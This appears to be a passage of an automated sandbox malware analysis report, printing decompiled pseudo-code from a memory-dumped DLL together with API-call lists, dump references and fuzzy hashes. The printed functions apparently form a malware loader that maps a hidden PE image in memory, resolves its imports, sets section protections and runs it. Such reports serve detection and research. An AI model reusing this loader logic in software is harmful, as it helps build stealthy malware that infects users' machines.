              								_v16 = _v16 + 0x1000;
              								 *0x6e1c41cc = _t77;
              							} while (_t69 < _t67);
              						}
              						if(_t77 != 0x63699bc3) {
              							_v24 = 0xc;
              						} else {
              							memcpy(_v48, _v36, _v20);
              						}
              						VirtualFree(_v36, 0, 0x8000); // executed
              					}
              				}
              				return _v24;
              			}






























              0x6e1c18b4
              0x6e1c18c4
              0x6e1c18cb
              0x6e1c18ce
              0x6e1c18e3
              0x6e1c18ea
              0x6e1c18ef
              0x6e1c1900
              0x6e1c1903
              0x6e1c1909
              0x6e1c190d
              0x6e1c1910
              0x6e1c19ec
              0x6e1c1916
              0x6e1c1916
              0x6e1c191a
              0x6e1c19b2
              0x6e1c1920
              0x6e1c1921
              0x6e1c1926
              0x6e1c1929
              0x6e1c192c
              0x6e1c192c
              0x6e1c1933
              0x6e1c1936
              0x6e1c193e
              0x6e1c193f
              0x6e1c1940
              0x6e1c1947
              0x6e1c194b
              0x6e1c1951
              0x6e1c1955
              0x6e1c1957
              0x6e1c195b
              0x6e1c195e
              0x6e1c1965
              0x6e1c1968
              0x6e1c196d
              0x6e1c1970
              0x6e1c1986
              0x6e1c1972
              0x6e1c197c
              0x6e1c197e
              0x6e1c1981
              0x6e1c1981
              0x6e1c198d
              0x6e1c198d
              0x6e1c198d
              0x6e1c1965
              0x6e1c1998
              0x6e1c199b
              0x6e1c199e
              0x6e1c19a7
              0x6e1c19a7
              0x6e1c19af
              0x6e1c19be
              0x6e1c19d3
              0x6e1c19c0
              0x6e1c19c9
              0x6e1c19ce
              0x6e1c19e4
              0x6e1c19e4
              0x6e1c19f3
              0x6e1c19f9

              APIs
              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1C1903
              • memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1C19C9
              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6E1C19E4
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Virtual$AllocFreememcpy
              • String ID: Jun 6 2021
              • API String ID: 4010158826-1013970402
              • Opcode ID: 9041a89bcec87a96430e14d1da3950d0a1523ac08092a97f323d91dd00585abe
              • Instruction ID: 946bd0d6041729a63682bd53d4e662095b0b71ab877402adc9a4d5ab533848a2
              • Opcode Fuzzy Hash: 9041a89bcec87a96430e14d1da3950d0a1523ac08092a97f323d91dd00585abe
              • Instruction Fuzzy Hash: BB419171E4020A9FDF00CFD9C844ADEBBB5BF59B10F248129D905B7244C779AA46DF92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			E6E1C20CE(void* __ecx, intOrPtr _a4) {
              				long _t3;
              				int _t4;
              				int _t9;
              				void* _t13;
              
              				_t13 = GetCurrentThread();
              				_t3 = SetThreadAffinityMask(_t13, 1); // executed
              				if(_t3 != 0) {
              					SetThreadPriority(_t13, 0xffffffff); // executed
              				}
              				_t4 = E6E1C1C7D(_a4); // executed
              				_t9 = _t4;
              				if(_t9 == 0) {
              					SetThreadPriority(_t13, _t4);
              				}
              				asm("lock xadd [eax], ecx");
              				return _t9;
              			}







              0x6e1c20d7
              0x6e1c20dc
              0x6e1c20ea
              0x6e1c20ef
              0x6e1c20ef
              0x6e1c20f5
              0x6e1c20fa
              0x6e1c20fe
              0x6e1c2102
              0x6e1c2102
              0x6e1c210c
              0x6e1c2115

              APIs
              • GetCurrentThread.KERNEL32 ref: 6E1C20D1
              • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1C20DC
              • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E1C20EF
              • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E1C2102
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Thread$Priority$AffinityCurrentMask
              • String ID:
              • API String ID: 1452675757-0
              • Opcode ID: 933d557eee8d911dd6a402775c867d4bb5510db097fbc0c16182fbf50dc663b2
              • Instruction ID: 2c79e13bd90c19555bf51c108f274b45117525a1d704e67eb3550663ab7717a1
              • Opcode Fuzzy Hash: 933d557eee8d911dd6a402775c867d4bb5510db097fbc0c16182fbf50dc663b2
              • Instruction Fuzzy Hash: 5CE09232305A112B96016B6D4C8CEAFAB9CEFA2B307110235F524D21D0CF9C8C5AB5AA
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetTempPathA.KERNEL32(00000404,6E296410,?), ref: 6E291A78
              • VirtualProtect.KERNELBASE(?,0000311B,00000040,?), ref: 6E291ACB
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: PathProtectTempVirtual
              • String ID: @
              • API String ID: 3422257996-2766056989
              • Opcode ID: 96b367ceb8b84aa88f6892ffd6cf1cab6d122d737cbd145f412c7706924fe3cb
              • Instruction ID: e63cf76e46b8c40e7ecaee793d322dc0eb3f9865a1344321cf64369ce3d49a0f
              • Opcode Fuzzy Hash: 96b367ceb8b84aa88f6892ffd6cf1cab6d122d737cbd145f412c7706924fe3cb
              • Instruction Fuzzy Hash: 4BA16CB0E42505CBDB08CFBAC48866DBBB3FF4A30AF54A12AD525A7359D7345540CB74
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			E6E1C126D(void* __eax, void* _a4) {
              				signed int _v8;
              				signed int _v12;
              				signed int _v16;
              				long _v20;
              				int _t43;
              				long _t54;
              				signed int _t57;
              				void* _t58;
              				signed int _t60;
              
              				_v12 = _v12 & 0x00000000;
              				_t57 =  *0x6e1c41cc;
              				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
              				_v16 =  *(__eax + 6) & 0x0000ffff;
              				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
              				_v8 = _v8 & 0x00000000;
              				if(_v16 <= 0) {
              					L12:
              					return _v12;
              				} else {
              					goto L1;
              				}
              				while(1) {
              					L1:
              					_t60 = _v12;
              					if(_t60 != 0) {
              						goto L12;
              					}
              					asm("bt [esi+0x24], eax");
              					if(_t60 >= 0) {
              						asm("bt [esi+0x24], eax");
              						if(__eflags >= 0) {
              							L8:
              							_t54 = _t57 - 0x63699bbf;
              							L9:
              							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
              							if(_t43 == 0) {
              								_v12 = GetLastError();
              							}
              							_v8 = _v8 + 1;
              							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
              							if(_v8 < _v16) {
              								continue;
              							} else {
              								goto L12;
              							}
              						}
              						asm("bt [esi+0x24], eax");
              						_t54 = _t57 - 0x63699bc1;
              						if(__eflags >= 0) {
              							goto L9;
              						}
              						goto L8;
              					}
              					asm("bt [esi+0x24], eax");
              					if(_t60 >= 0) {
              						_t54 = _t57 - 0x63699ba3;
              					} else {
              						_t54 = _t57 - 0x63699b83;
              					}
              					goto L9;
              				}
              				goto L12;
              			}












              0x6e1c1277
              0x6e1c1284
              0x6e1c128a
              0x6e1c1296
              0x6e1c12a6
              0x6e1c12a8
              0x6e1c12b0
              0x6e1c1345
              0x6e1c134c
              0x00000000
              0x00000000
              0x00000000
              0x6e1c12b6
              0x6e1c12b6
              0x6e1c12b6
              0x6e1c12ba
              0x00000000
              0x00000000
              0x6e1c12c6
              0x6e1c12ca
              0x6e1c12ee
              0x6e1c12f2
              0x6e1c1306
              0x6e1c1306
              0x6e1c130c
              0x6e1c131b
              0x6e1c131f
              0x6e1c1327
              0x6e1c1327
              0x6e1c132f
              0x6e1c1332
              0x6e1c133f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6e1c133f
              0x6e1c12fa
              0x6e1c12fe
              0x6e1c1304
              0x00000000
              0x00000000
              0x00000000
              0x6e1c1304
              0x6e1c12d2
              0x6e1c12d6
              0x6e1c12e0
              0x6e1c12d8
              0x6e1c12d8
              0x6e1c12d8
              0x00000000
              0x6e1c12d6
              0x00000000

              APIs
              • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E1C12A6
              • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1C131B
              • GetLastError.KERNEL32 ref: 6E1C1321
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ProtectVirtual$ErrorLast
              • String ID:
              • API String ID: 1469625949-0
              • Opcode ID: 6370d544829a0ce01c0acfda8b4b9c4065407968fa529c2e37cd0f2d101497ff
              • Instruction ID: 6de340f4de621f47e0e158a919ecde2a9fb67c8515e8ff5d1d379560d900e39a
              • Opcode Fuzzy Hash: 6370d544829a0ce01c0acfda8b4b9c4065407968fa529c2e37cd0f2d101497ff
              • Instruction Fuzzy Hash: BD219131A0020ADFCB14CFD5C485AAAF7F5FF18719F104859D106D7984E3BCA69ADB91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 80%
              			E6E1C14E8() {
              				char _v28;
              				void _v44;
              				char _v48;
              				void* _v52;
              				long _t23;
              				int _t24;
              				void* _t28;
              				intOrPtr* _t30;
              				signed int _t34;
              				intOrPtr _t36;
              
              				_push(0);
              				_push(0x6e1c41c4);
              				_push(1);
              				_push( *0x6e1c41d0 + 0x6e1c5089);
              				 *0x6e1c41c0 = 0xc;
              				 *0x6e1c41c8 = 0; // executed
              				L6E1C1DA8(); // executed
              				_t34 = 6;
              				memset( &_v44, 0, _t34 << 2);
              				if(E6E1C1697( &_v44,  &_v28,  *0x6e1c41cc ^ 0xfd7cd1cf) == 0) {
              					_t23 = 0xb;
              					L7:
              					ExitThread(_t23);
              				}
              				_t24 = lstrlenW( *0x6e1c41b8);
              				_t7 = _t24 + 2; // 0x2
              				_t10 = _t24 + _t7 + 8; // 0xa
              				_t28 = E6E1C1144(_t36, _t10,  &_v48,  &_v52); // executed
              				if(_t28 == 0) {
              					_t30 = _v52;
              					 *_t30 = 0;
              					if( *0x6e1c41b8 == 0) {
              						 *((short*)(_t30 + 4)) = 0;
              					} else {
              						E6E1C2118(_t40, _t30 + 4);
              					}
              				}
              				_t23 = E6E1C1444(_v44); // executed
              				goto L7;
              			}













              0x6e1c14fa
              0x6e1c14fb
              0x6e1c1500
              0x6e1c1508
              0x6e1c1509
              0x6e1c1513
              0x6e1c1519
              0x6e1c1522
              0x6e1c1527
              0x6e1c1545
              0x6e1c159a
              0x6e1c159b
              0x6e1c159c
              0x6e1c159c
              0x6e1c154d
              0x6e1c1553
              0x6e1c1561
              0x6e1c1565
              0x6e1c156c
              0x6e1c1574
              0x6e1c1578
              0x6e1c157a
              0x6e1c1589
              0x6e1c157c
              0x6e1c1582
              0x6e1c1582
              0x6e1c157a
              0x6e1c1591
              0x00000000

              APIs
              • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6E1C41C4,00000000), ref: 6E1C1519
              • lstrlenW.KERNEL32(?,?,?), ref: 6E1C154D
                • Part of subcall function 6E1C1144: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?,?), ref: 6E1C1151
                • Part of subcall function 6E1C1144: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1C1167
                • Part of subcall function 6E1C1144: _snwprintf.NTDLL ref: 6E1C118C
                • Part of subcall function 6E1C1144: CreateFileMappingW.KERNELBASE(000000FF,6E1C41C0,00000004,00000000,?,?), ref: 6E1C11B1
                • Part of subcall function 6E1C1144: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?), ref: 6E1C11C8
                • Part of subcall function 6E1C1144: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A), ref: 6E1C11FD
              • ExitThread.KERNEL32 ref: 6E1C159C
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
              • String ID:
              • API String ID: 4209869662-0
              • Opcode ID: 6af3099644ce70fd104e6c0079e4cf642078561fd0cb4dbe9dfb6e9730e7bf18
              • Instruction ID: 18c92fd0fc231d1c8a554e584d239e097ef40d85531394c2ee019f597a969bfd
              • Opcode Fuzzy Hash: 6af3099644ce70fd104e6c0079e4cf642078561fd0cb4dbe9dfb6e9730e7bf18
              • Instruction Fuzzy Hash: EF1190B2288601AFDB01CFA5C848D9B7BFCAB66F04F014916F559D7140D738E58AAB93
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C1F7C(void* __edi, intOrPtr _a4) {
              				signed int _v8;
              				intOrPtr* _v12;
              				_Unknown_base(*)()** _v16;
              				signed int _v20;
              				signed short _v24;
              				struct HINSTANCE__* _v28;
              				intOrPtr _t43;
              				intOrPtr* _t45;
              				intOrPtr _t46;
              				struct HINSTANCE__* _t47;
              				intOrPtr* _t49;
              				intOrPtr _t50;
              				signed short _t51;
              				_Unknown_base(*)()* _t53;
              				CHAR* _t54;
              				_Unknown_base(*)()* _t55;
              				void* _t58;
              				signed int _t59;
              				_Unknown_base(*)()* _t60;
              				intOrPtr _t61;
              				intOrPtr _t65;
              				signed int _t68;
              				void* _t69;
              				CHAR* _t71;
              				signed short* _t73;
              
              				_t69 = __edi;
              				_v20 = _v20 & 0x00000000;
              				_t59 =  *0x6e1c41cc;
              				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
              				if(_t43 != 0) {
              					_t45 = _t43 + __edi;
              					_v12 = _t45;
              					_t46 =  *((intOrPtr*)(_t45 + 0xc));
              					if(_t46 != 0) {
              						while(1) {
              							_t71 = _t46 + _t69;
              							_t47 = LoadLibraryA(_t71); // executed
              							_v28 = _t47;
              							if(_t47 == 0) {
              								break;
              							}
              							_v24 = _v24 & 0x00000000;
              							 *_t71 = _t59 - 0x63699bc3;
              							_t49 = _v12;
              							_t61 =  *((intOrPtr*)(_t49 + 0x10));
              							_t50 =  *_t49;
              							if(_t50 != 0) {
              								L6:
              								_t73 = _t50 + _t69;
              								_v16 = _t61 + _t69;
              								while(1) {
              									_t51 =  *_t73;
              									if(_t51 == 0) {
              										break;
              									}
              									if(__eflags < 0) {
              										__eflags = _t51 - _t69;
              										if(_t51 < _t69) {
              											L12:
              											_t21 =  &_v8;
              											 *_t21 = _v8 & 0x00000000;
              											__eflags =  *_t21;
              											_v24 =  *_t73 & 0x0000ffff;
              										} else {
              											_t65 = _a4;
              											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
              											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
              												goto L12;
              											} else {
              												goto L11;
              											}
              										}
              									} else {
              										_t51 = _t51 + _t69;
              										L11:
              										_v8 = _t51;
              									}
              									_t53 = _v8;
              									__eflags = _t53;
              									if(_t53 == 0) {
              										_t54 = _v24 & 0x0000ffff;
              									} else {
              										_t54 = _t53 + 2;
              									}
              									_t55 = GetProcAddress(_v28, _t54);
              									__eflags = _t55;
              									if(__eflags == 0) {
              										_v20 = _t59 - 0x63699b44;
              									} else {
              										_t68 = _v8;
              										__eflags = _t68;
              										if(_t68 != 0) {
              											 *_t68 = _t59 - 0x63699bc3;
              										}
              										 *_v16 = _t55;
              										_t58 = 0x725990f8 + _t59 * 4;
              										_t73 = _t73 + _t58;
              										_t32 =  &_v16;
              										 *_t32 = _v16 + _t58;
              										__eflags =  *_t32;
              										continue;
              									}
              									goto L23;
              								}
              							} else {
              								_t50 = _t61;
              								if(_t61 != 0) {
              									goto L6;
              								}
              							}
              							L23:
              							_v12 = _v12 + 0x14;
              							_t46 =  *((intOrPtr*)(_v12 + 0xc));
              							if(_t46 != 0) {
              								continue;
              							} else {
              							}
              							L26:
              							goto L27;
              						}
              						_t60 = _t59 + 0x9c9664bb;
              						__eflags = _t60;
              						_v20 = _t60;
              						goto L26;
              					}
              				}
              				L27:
              				return _v20;
              			}




























              0x6e1c1f7c
              0x6e1c1f85
              0x6e1c1f8a
              0x6e1c1f90
              0x6e1c1f99
              0x6e1c1f9f
              0x6e1c1fa1
              0x6e1c1fa4
              0x6e1c1fa9
              0x6e1c1fb0
              0x6e1c1fb0
              0x6e1c1fb4
              0x6e1c1fbc
              0x6e1c1fbf
              0x00000000
              0x00000000
              0x6e1c1fc5
              0x6e1c1fcf
              0x6e1c1fd1
              0x6e1c1fd4
              0x6e1c1fd7
              0x6e1c1fdb
              0x6e1c1fe3
              0x6e1c1fe5
              0x6e1c1fe8
              0x6e1c2050
              0x6e1c2050
              0x6e1c2054
              0x00000000
              0x00000000
              0x6e1c1fed
              0x6e1c1ff3
              0x6e1c1ff5
              0x6e1c2008
              0x6e1c200b
              0x6e1c200b
              0x6e1c200b
              0x6e1c200f
              0x6e1c1ff7
              0x6e1c1ff7
              0x6e1c1fff
              0x6e1c2001
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6e1c2001
              0x6e1c1fef
              0x6e1c1fef
              0x6e1c2003
              0x6e1c2003
              0x6e1c2003
              0x6e1c2012
              0x6e1c2015
              0x6e1c2017
              0x6e1c201e
              0x6e1c2019
              0x6e1c2019
              0x6e1c2019
              0x6e1c2026
              0x6e1c202c
              0x6e1c202e
              0x6e1c205e
              0x6e1c2030
              0x6e1c2030
              0x6e1c2033
              0x6e1c2035
              0x6e1c203d
              0x6e1c203d
              0x6e1c2042
              0x6e1c2044
              0x6e1c204b
              0x6e1c204d
              0x6e1c204d
              0x6e1c204d
              0x00000000
              0x6e1c204d
              0x00000000
              0x6e1c202e
              0x6e1c1fdd
              0x6e1c1fdf
              0x6e1c1fe1
              0x00000000
              0x00000000
              0x6e1c1fe1
              0x6e1c2061
              0x6e1c2061
              0x6e1c2068
              0x6e1c206d
              0x00000000
              0x00000000
              0x6e1c2073
              0x6e1c207e
              0x00000000
              0x6e1c207e
              0x6e1c2075
              0x6e1c2075
              0x6e1c207b
              0x00000000
              0x6e1c207b
              0x6e1c1fa9
              0x6e1c207f
              0x6e1c2084

              APIs
              • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1C1FB4
              • GetProcAddress.KERNEL32(?,00000000), ref: 6E1C2026
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID:
              • API String ID: 2574300362-0
              • Opcode ID: c748fc5e8b8994ffc6bb63df03aa65b9411437cb7578e2276a3303b1141ca453
              • Instruction ID: f992cfdbcde13cd31fb28b6e3f1b0a89e489c140df5a262a14a975afbff3f888
              • Opcode Fuzzy Hash: c748fc5e8b8994ffc6bb63df03aa65b9411437cb7578e2276a3303b1141ca453
              • Instruction Fuzzy Hash: AA316B71A00606DFDB40CF99C894AAEB7F4FF29B00B20406ED815E7344E778DA95EB52
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 83%
              			E6E1C1ADB(void* __ecx) {
              				void* _v8;
              				char _v12;
              				char* _t18;
              				char* _t25;
              				char* _t29;
              
              				_t22 = __ecx;
              				_push(__ecx);
              				_push(__ecx);
              				_t25 = 0;
              				if(E6E1C1697( &_v8,  &_v12,  *0x6e1c41cc ^ 0x196db149) != 0) {
              					if(_v8 == 0) {
              						_t29 = 0;
              					} else {
              						_t29 = E6E1C2087(_t22, _v8,  *0x6e1c41cc ^ 0x6e49bbff);
              					}
              					if(_t29 != 0) {
              						_v12 = E6E1C1E8A(_t22) & 0x0000ffff;
              						_t18 = StrStrIA(_t29,  &_v12); // executed
              						if(_t18 != 0) {
              							_t25 = 0x657;
              						}
              					}
              					HeapFree( *0x6e1c4190, 0, _v8);
              				}
              				return _t25;
              			}








              0x6e1c1adb
              0x6e1c1ade
              0x6e1c1adf
              0x6e1c1af5
              0x6e1c1afe
              0x6e1c1b03
              0x6e1c1b1c
              0x6e1c1b05
              0x6e1c1b18
              0x6e1c1b18
              0x6e1c1b20
              0x6e1c1b2a
              0x6e1c1b32
              0x6e1c1b3a
              0x6e1c1b3c
              0x6e1c1b3c
              0x6e1c1b3a
              0x6e1c1b4c
              0x6e1c1b4c
              0x6e1c1b57

              APIs
              • StrStrIA.KERNELBASE(00000000,6E1C1CE6,?,6E1C1CE6,?,00000000,00000000,?,?,?,6E1C1CE6), ref: 6E1C1B32
              • HeapFree.KERNEL32(00000000,?,?,6E1C1CE6,?,00000000,00000000,?,?,?,6E1C1CE6), ref: 6E1C1B4C
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: 1e3674f53436eb6d26a43b4bdd59668a53ba879cfe767a7d732bd85376c51c23
              • Instruction ID: cd0a8975aa1de8ab96023e7bd82271ea0a35348a2be9e1cc95c7e2955ad8bdc8
              • Opcode Fuzzy Hash: 1e3674f53436eb6d26a43b4bdd59668a53ba879cfe767a7d732bd85376c51c23
              • Instruction Fuzzy Hash: 7D01D476B40515ABCB01CBE5CC04EDF7BBDEB65A00F204162AA04E3100E639EA45BAA5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • VirtualAlloc.KERNELBASE(00000000,000006AB,00003000,00000040,000006AB,6E296BE0), ref: 6E297245
              Memory Dump Source
              • Source File: 00000004.00000002.464772699.000000006E296000.00000040.00020000.sdmp, Offset: 6E296000, based on PE: false
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 3b7f4f277552c08043b77d53c2eaeb7fb0dece6731ac5fd554f8099d5e0bcc64
              • Instruction ID: 5f650b33fbf91d3fd2e8880e8d98c678b726e1b9c6253895a0497eeb5d318631
              • Opcode Fuzzy Hash: 3b7f4f277552c08043b77d53c2eaeb7fb0dece6731ac5fd554f8099d5e0bcc64
              • Instruction Fuzzy Hash: E4210E321092468FD70BCF65C8A07867B62AB82300F1E15ABCC46EF3C6D760680ADB60
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			E6E1C1444(void* __eax) {
              				char _v8;
              				void* _v12;
              				void* __edi;
              				void* _t18;
              				long _t24;
              				long _t26;
              				long _t29;
              				intOrPtr _t40;
              				void* _t41;
              				intOrPtr* _t42;
              				void* _t44;
              
              				_t41 = __eax;
              				_t16 =  *0x6e1c41cc;
              				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1c41cc - 0x63698bc4 &  !( *0x6e1c41cc - 0x63698bc4);
              				_t18 = E6E1C1060( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1c41cc - 0x63698bc4 &  !( *0x6e1c41cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1c41cc - 0x63698bc4 &  !( *0x6e1c41cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
              				if(_t18 != 0) {
              					_t29 = 8;
              					goto L8;
              				} else {
              					_t40 = _v8;
              					_t29 = E6E1C1A5A(_t33, _t40, _t41);
              					if(_t29 == 0) {
              						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
              						_t24 = E6E1C1F7C(_t40, _t44); // executed
              						_t29 = _t24;
              						if(_t29 == 0) {
              							_t26 = E6E1C126D(_t44, _t40); // executed
              							_t29 = _t26;
              							if(_t29 == 0) {
              								_push(_t26);
              								_push(1);
              								_push(_t40);
              								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
              									_t29 = GetLastError();
              								}
              							}
              						}
              					}
              					_t42 = _v12;
              					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
              					E6E1C142F(_t42);
              					L8:
              					return _t29;
              				}
              			}














              0x6e1c144c
              0x6e1c144e
              0x6e1c146a
              0x6e1c147b
              0x6e1c1482
              0x6e1c14e0
              0x00000000
              0x6e1c1484
              0x6e1c1484
              0x6e1c148e
              0x6e1c1492
              0x6e1c1497
              0x6e1c149a
              0x6e1c149f
              0x6e1c14a3
              0x6e1c14a8
              0x6e1c14ad
              0x6e1c14b1
              0x6e1c14b6
              0x6e1c14b7
              0x6e1c14bb
              0x6e1c14c0
              0x6e1c14c8
              0x6e1c14c8
              0x6e1c14c0
              0x6e1c14b1
              0x6e1c14a3
              0x6e1c14ca
              0x6e1c14d3
              0x6e1c14d7
              0x6e1c14e1
              0x6e1c14e7
              0x6e1c14e7

              APIs
                • Part of subcall function 6E1C1060: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E1C1480,?,?,?,?,00000002,00000000,?,?), ref: 6E1C1084
                • Part of subcall function 6E1C1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10A6
                • Part of subcall function 6E1C1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10BC
                • Part of subcall function 6E1C1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10D2
                • Part of subcall function 6E1C1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10E8
                • Part of subcall function 6E1C1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10FE
                • Part of subcall function 6E1C1A5A: memcpy.NTDLL(00000000,00000002,6E1C148E,?,?,?,?,?,6E1C148E,?,?,?,?,?,?,00000002), ref: 6E1C1A87
                • Part of subcall function 6E1C1A5A: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6E1C1ABA
                • Part of subcall function 6E1C1F7C: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1C1FB4
                • Part of subcall function 6E1C126D: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E1C12A6
                • Part of subcall function 6E1C126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1C131B
                • Part of subcall function 6E1C126D: GetLastError.KERNEL32 ref: 6E1C1321
              • GetLastError.KERNEL32(?,?), ref: 6E1C14C2
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
              • String ID:
              • API String ID: 2673762927-0
              • Opcode ID: 631c73b6a68c408efe95f21eb522350c53cbbaf012f7e67f99f16e556f4c87ff
              • Instruction ID: 5a7fad273fd0fee94db9a56d62665650435849fed935fb375d0785817b05509b
              • Opcode Fuzzy Hash: 631c73b6a68c408efe95f21eb522350c53cbbaf012f7e67f99f16e556f4c87ff
